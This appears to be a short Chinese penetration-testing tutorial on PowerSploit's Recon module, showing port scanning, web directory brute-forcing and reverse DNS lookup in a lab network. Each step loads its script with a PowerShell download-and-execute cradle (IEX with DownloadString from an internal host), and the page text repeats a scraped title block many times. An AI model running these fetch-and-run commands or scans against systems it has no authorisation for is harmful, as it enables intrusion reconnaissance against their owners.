天天看點

POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 

POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰

Recon(資訊偵察)子產品

a) 調用invoke-Portscan掃描内網主機的端口。

1)通過IEX下載下傳并調用invoke-portscan。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-Portscan.ps1")
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 
PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 

b) 調用Get-HttpStatus掃描目标站點的目錄。

1)通過IEX下載下傳并調用Get-HttpStatus。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht
tpStatus.ps1")
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 
PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 

c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。

1)通過IEX下載下傳并調用Invoke-ReverseDnsLookup。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-ReverseDnsLookup.ps1")
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 
PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'
           
POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰Recon(資訊偵察)子產品a) 調用invoke-Portscan掃描内網主機的端口。b) 調用Get-HttpStatus掃描目标站點的目錄。c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。 

posted @ 2019-03-16 20:47 卿先生 閱讀(...) 評論(...) 編輯 收藏

繼續閱讀